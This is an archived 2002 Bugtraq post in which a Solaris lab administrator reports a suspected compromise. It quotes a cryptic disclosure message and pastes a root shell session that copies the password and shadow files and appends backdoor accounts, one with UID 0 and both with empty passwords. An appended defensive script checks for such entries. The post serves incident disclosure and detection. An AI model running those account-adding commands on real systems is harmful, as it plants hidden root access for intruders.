[26702] in bugtraq


Subtle insinuations may be more than idle threats I'm afraid.

daemon@ATHENA.MIT.EDU (security@australia.edu)
Fri Aug 16 16:52:01 2002

From: security@australia.edu
Reply-To: security@australia.edu
To: bugtraq@securityfocus.com
Date: Thu, 15 Aug 2002 15:35:12 -0800
Message-id: <3d5d0d41.2ab8.0@australia.edu>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit


memetic-engineer@hushmail.com wrote:
http://lists.netsys.com/pipermail/full-disclosure/2002-August/001073.html


"#old solaris bug die hard.....something similar, but not quite. Have you audited
your Solstice

#products recently? lit_tty was nothing.
    M^ got lost again
    ( agent.lspitzner.added.to.meme156)
 cp /etc/passwd /etc/.tp;"



 I assumed he was speaking of a variation of this old thing;
> # cp /etc/passwd /etc/.tp;
^Mcp /etc/shadow /etc/.ts;
echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd;
echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd;
echo "r::10891::::::" >> /etc/shadow;
echo "re::6445::::::" >> /etc/shadow;
: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# who;
rsides    console     WED Aug 15 2002 21:09
^M: not found
# exit;


and after converting the hex saw that it was an exact replica.

    To make a long story short, I woke up yesterday to find this in my home
directory:

./MeMe156/agent.agency.08.14.02.2348/added .agent.sol


after looking through ;
/var/adm/messages
/var/adm/syslog

to no avail, I used what I thought to be a clever script that logs
auth.notice messages. NOTHING

/var/log/utmp; /var/log/utmpx
/var/log/wtmp; /var/log/wtmpx
/var/log/syslog

nothing. But then /var/log/sulog  showed me this;
SU 03/31 12:52 + pts/0 <userid>-root
 and /var/adm/messages revealed this
Mar 31 12:48:41 ***.***.***.*** unix: rebooting...

almost convenient that it was there at all. If anyone else has any
information remotely related please respond.

I administer a private lab running 2 Sun LX50's involved in active Ionospheric
research and HF analysis.



"In building a machine we are so intent upon our purpose that we forget that
we are investing that machine with creative power...it can overgrow us in an
invisible way...they are the dwelling-places of divine powers that may destroy
us."
-C.G. Jung
  
      

This message was sent from http://australia.edu
Check out the new international site at http://australia.edu/international
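
An added example, not part of the original message: a defender's check for the kind of entries the pasted session appends (an extra UID 0 account, empty shadow password fields) and for accounts added since a leftover copy such as /etc/.tp. The function names, the AWK variable and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example: checks for the account entries shown in the session above.
# Function names and the sample files are constructed for illustration.
# On Solaris set AWK=nawk (or /usr/xpg4/bin/awk); the legacy awk lacks "in".
AWK=${AWK:-awk}

# Login names with UID 0 other than root (the "r:x:0:0" line).
extra_uid0() {
    "$AWK" -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Login names whose shadow password field is empty (the "r::10891" line).
empty_shadow_pw() {
    "$AWK" -F: 'NF >= 2 && $2 == "" { print $1 }' "$1"
}

# Login names in the current file ($2) that are absent from a baseline ($1).
# The session copies passwd to /etc/.tp before appending, so a leftover
# /etc/.tp is both an indicator and a usable baseline.
added_accounts() {
    "$AWK" -F: 'FILENAME == ARGV[1] { seen[$1] = 1; next }
                !($1 in seen) { print $1 }' "$1" "$2"
}

# Constructed sample data, written to a scratch directory.
SAMPLE=$(mktemp -d)
cat > "$SAMPLE/.tp" <<'EOF'
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
alice:x:1001:10::/export/home/alice:/bin/sh
EOF
{ cat "$SAMPLE/.tp"
  echo "r:x:0:0:User:/:/sbin/sh"
  echo "re:x:500:1000:daemon:/:/sbin/sh"; } > "$SAMPLE/passwd"
cat > "$SAMPLE/shadow" <<'EOF'
root:CONSTRUCTED-HASH:6445::::::
daemon:NP:6445::::::
alice:CONSTRUCTED-HASH:11900::::::
r::10891::::::
re::6445::::::
EOF

echo "UID 0 besides root: $(extra_uid0 "$SAMPLE/passwd" | tr '\n' ' ')"
echo "Empty shadow password: $(empty_shadow_pw "$SAMPLE/shadow" | tr '\n' ' ')"
echo "Added since baseline: $(added_accounts "$SAMPLE/.tp" "$SAMPLE/passwd" | tr '\n' ' ')"
```

On a live host the same functions take /etc/passwd, /etc/shadow and, if present, /etc/.tp as arguments.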
